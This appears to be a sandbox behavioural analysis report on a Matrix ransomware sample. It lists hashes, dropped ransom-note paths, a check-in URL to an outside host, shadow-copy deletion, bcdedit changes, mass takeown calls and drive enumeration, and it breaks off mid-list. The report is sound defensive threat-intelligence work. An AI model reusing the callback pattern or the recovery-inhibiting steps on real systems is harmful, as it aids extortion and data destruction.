Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10_x64 -
resource
win10 -
submitted
08-10-2020 15:06
Static task
static1
Behavioral task
behavioral1
Sample
ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
Resource
win10
General
-
Target
ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
-
Size
1.2MB
-
MD5
0e527383dc50b48d63183e1176c4d79e
-
SHA1
c1437130dd774db14dd16c45771e7e1a484d5ee5
-
SHA256
ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a
-
SHA512
58a3edde62268c34b2577530b520559c8c8f4f085210703c59c75442b9162e396ea38973302afc3e54d6d546ccd7b246650b4e9aef137d7b7787ab3354aec457
Malware Config
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Public\Libraries\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe HTTP URL 29 http://ghb.timerz.org/addrecord.php?apikey=BWNG_api_key&compuser=GOHCSFBB|Admin&sid=ujcQuPALLpO9BXQm&phase=[ALL]0F56F5E69B9240B0 Process not Found File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-US\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\pt-br\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hu\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\es-es\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\id\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\AppData\LocalLow\Oracle\Java\jdk1.8.0_66_x64\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files\Java\jre1.8.0_66\bin\server\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files\Mozilla Firefox\fonts\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\fr\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-cn\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\Saved Games\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\!BWNG_INFO!.rtf ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4420 bcdedit.exe 1008 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS UxaXqOSf64.exe -
Executes dropped EXE 64 IoCs
pid Process 1412 NWmQwMXy.exe 4652 UxaXqOSf.exe 4720 UxaXqOSf64.exe 4776 UxaXqOSf.exe 4800 UxaXqOSf.exe 4164 UxaXqOSf.exe 4296 UxaXqOSf.exe 4704 UxaXqOSf.exe 4748 UxaXqOSf.exe 4364 UxaXqOSf.exe 4824 UxaXqOSf.exe 4836 UxaXqOSf.exe 4852 UxaXqOSf.exe 1680 UxaXqOSf.exe 3104 UxaXqOSf.exe 3004 UxaXqOSf.exe 252 UxaXqOSf.exe 4772 UxaXqOSf.exe 1020 UxaXqOSf.exe 4984 UxaXqOSf.exe 4576 UxaXqOSf.exe 3792 UxaXqOSf.exe 408 UxaXqOSf.exe 248 UxaXqOSf.exe 260 UxaXqOSf.exe 4340 UxaXqOSf.exe 4216 UxaXqOSf.exe 4820 UxaXqOSf.exe 4840 UxaXqOSf.exe 4112 UxaXqOSf.exe 748 UxaXqOSf.exe 4160 UxaXqOSf.exe 5112 UxaXqOSf.exe 4556 UxaXqOSf.exe 4916 UxaXqOSf.exe 4804 UxaXqOSf.exe 4100 UxaXqOSf.exe 2592 UxaXqOSf.exe 4860 UxaXqOSf.exe 4768 UxaXqOSf.exe 244 UxaXqOSf.exe 4504 UxaXqOSf.exe 2404 UxaXqOSf.exe 4536 UxaXqOSf.exe 256 UxaXqOSf.exe 4220 UxaXqOSf.exe 4912 UxaXqOSf.exe 4960 UxaXqOSf.exe 4452 UxaXqOSf.exe 4956 UxaXqOSf.exe 2500 UxaXqOSf.exe 268 UxaXqOSf.exe 4952 UxaXqOSf.exe 4596 UxaXqOSf.exe 4332 UxaXqOSf.exe 4924 UxaXqOSf.exe 4420 UxaXqOSf.exe 4240 UxaXqOSf.exe 4424 UxaXqOSf.exe 272 UxaXqOSf.exe 4964 UxaXqOSf.exe 2524 UxaXqOSf.exe 4784 UxaXqOSf.exe 4812 UxaXqOSf.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\StartProtect.tiff ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000100000001adaa-22.dat upx behavioral2/files/0x000100000001adaa-23.dat upx behavioral2/files/0x000100000001adaa-29.dat upx behavioral2/files/0x000100000001adaa-31.dat upx behavioral2/files/0x000100000001adaa-41.dat upx behavioral2/files/0x000100000001adaa-43.dat upx behavioral2/files/0x000100000001adaa-49.dat upx behavioral2/files/0x000100000001adaa-51.dat upx behavioral2/files/0x000100000001adaa-57.dat upx behavioral2/files/0x000100000001adaa-59.dat upx behavioral2/files/0x000100000001adaa-65.dat upx behavioral2/files/0x000100000001adaa-67.dat upx behavioral2/files/0x000100000001adaa-74.dat upx behavioral2/files/0x000100000001adaa-76.dat upx behavioral2/files/0x000100000001adaa-82.dat upx behavioral2/files/0x000100000001adaa-84.dat upx behavioral2/files/0x000100000001adaa-90.dat upx behavioral2/files/0x000100000001adaa-92.dat upx behavioral2/files/0x000100000001adaa-98.dat upx behavioral2/files/0x000100000001adaa-100.dat upx behavioral2/files/0x000100000001adaa-106.dat upx behavioral2/files/0x000100000001adaa-108.dat upx behavioral2/files/0x000100000001adaa-114.dat upx behavioral2/files/0x000100000001adaa-116.dat upx behavioral2/files/0x000100000001adaa-122.dat upx behavioral2/files/0x000100000001adaa-124.dat upx behavioral2/files/0x000100000001adaa-130.dat upx behavioral2/files/0x000100000001adaa-132.dat upx behavioral2/files/0x000100000001adaa-138.dat upx behavioral2/files/0x000100000001adaa-140.dat upx behavioral2/files/0x000100000001adaa-146.dat upx behavioral2/files/0x000100000001adaa-148.dat upx behavioral2/files/0x000100000001adaa-154.dat upx behavioral2/files/0x000100000001adaa-156.dat upx behavioral2/files/0x000100000001adaa-162.dat upx behavioral2/files/0x000100000001adaa-164.dat upx behavioral2/files/0x000100000001adaa-170.dat upx behavioral2/files/0x000100000001adaa-172.dat upx behavioral2/files/0x000100000001adaa-179.dat upx behavioral2/files/0x000100000001adaa-181.dat upx behavioral2/files/0x000100000001adaa-189.dat upx behavioral2/files/0x000100000001adaa-191.dat upx behavioral2/files/0x000100000001adaa-197.dat upx behavioral2/files/0x000100000001adaa-199.dat upx behavioral2/files/0x000100000001adaa-205.dat upx behavioral2/files/0x000100000001adaa-207.dat upx behavioral2/files/0x000100000001adaa-213.dat upx behavioral2/files/0x000100000001adaa-215.dat upx behavioral2/files/0x000100000001adaa-221.dat upx behavioral2/files/0x000100000001adaa-223.dat upx behavioral2/files/0x000100000001adaa-229.dat upx behavioral2/files/0x000100000001adaa-231.dat upx behavioral2/files/0x000100000001adaa-237.dat upx behavioral2/files/0x000100000001adaa-239.dat upx behavioral2/files/0x000100000001adaa-245.dat upx behavioral2/files/0x000100000001adaa-247.dat upx behavioral2/files/0x000100000001adaa-253.dat upx behavioral2/files/0x000100000001adaa-255.dat upx behavioral2/files/0x000100000001adaa-261.dat upx behavioral2/files/0x000100000001adaa-263.dat upx behavioral2/files/0x000100000001adaa-269.dat upx behavioral2/files/0x000100000001adaa-271.dat upx behavioral2/files/0x000100000001adaa-277.dat upx behavioral2/files/0x000100000001adaa-279.dat upx -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 4968 takeown.exe 4844 takeown.exe 4696 takeown.exe 5400 takeown.exe 4508 takeown.exe 5132 takeown.exe 5540 takeown.exe 5888 takeown.exe 4152 takeown.exe 3824 takeown.exe 3036 takeown.exe 4448 takeown.exe 4408 takeown.exe 4668 takeown.exe 4900 takeown.exe 5572 takeown.exe 5824 takeown.exe 5092 takeown.exe 6080 takeown.exe 5800 takeown.exe 5220 takeown.exe 4944 takeown.exe 5408 takeown.exe 4192 takeown.exe 4604 takeown.exe 5284 takeown.exe 6096 takeown.exe 5772 takeown.exe 5528 takeown.exe 4764 takeown.exe 3808 takeown.exe 4808 takeown.exe 4936 takeown.exe 5156 takeown.exe 4196 takeown.exe 5436 takeown.exe 5020 takeown.exe 5428 takeown.exe 1332 takeown.exe 2492 takeown.exe 5848 takeown.exe 5136 takeown.exe 5260 takeown.exe 5892 takeown.exe 5232 takeown.exe 3804 takeown.exe 5080 takeown.exe 4492 takeown.exe 5748 takeown.exe 5900 takeown.exe 5248 takeown.exe 5812 takeown.exe 576 takeown.exe 3940 takeown.exe 4528 takeown.exe 5592 takeown.exe 5476 takeown.exe 200 takeown.exe 4380 takeown.exe 4464 takeown.exe 4856 takeown.exe 6028 takeown.exe 5640 takeown.exe 5644 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 26 IoCs
description ioc Process File opened for modification C:\Users\Admin\Documents\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Links\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files (x86)\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Public\Videos\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Public\Libraries\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Videos\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Music\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Public\Desktop\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Searches\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Public\Music\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Public\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Public\Pictures\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Program Files\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Public\Downloads\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened for modification C:\Users\Public\Documents\desktop.ini ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\M: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\H: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\W: UxaXqOSf64.exe File opened (read-only) \??\Z: UxaXqOSf64.exe File opened (read-only) \??\H: UxaXqOSf64.exe File opened (read-only) \??\I: UxaXqOSf64.exe File opened (read-only) \??\R: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\Q: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\J: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\E: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\B: UxaXqOSf64.exe File opened (read-only) \??\F: UxaXqOSf64.exe File opened (read-only) \??\U: UxaXqOSf64.exe File opened (read-only) \??\P: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\I: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\E: UxaXqOSf64.exe File opened (read-only) \??\S: UxaXqOSf64.exe File opened (read-only) \??\Y: UxaXqOSf64.exe File opened (read-only) \??\Z: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\O: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\J: UxaXqOSf64.exe File opened (read-only) \??\P: UxaXqOSf64.exe File opened (read-only) \??\T: UxaXqOSf64.exe File opened (read-only) \??\S: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\M: UxaXqOSf64.exe File opened (read-only) \??\N: UxaXqOSf64.exe File opened (read-only) \??\V: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\T: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\G: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\F: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\G: UxaXqOSf64.exe File opened (read-only) \??\K: UxaXqOSf64.exe File opened (read-only) \??\Q: UxaXqOSf64.exe File opened (read-only) \??\V: UxaXqOSf64.exe File opened (read-only) \??\X: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\K: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\A: UxaXqOSf64.exe File opened (read-only) \??\O: UxaXqOSf64.exe File opened (read-only) \??\X: UxaXqOSf64.exe File opened (read-only) \??\W: ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe File opened (read-only) \??\U: 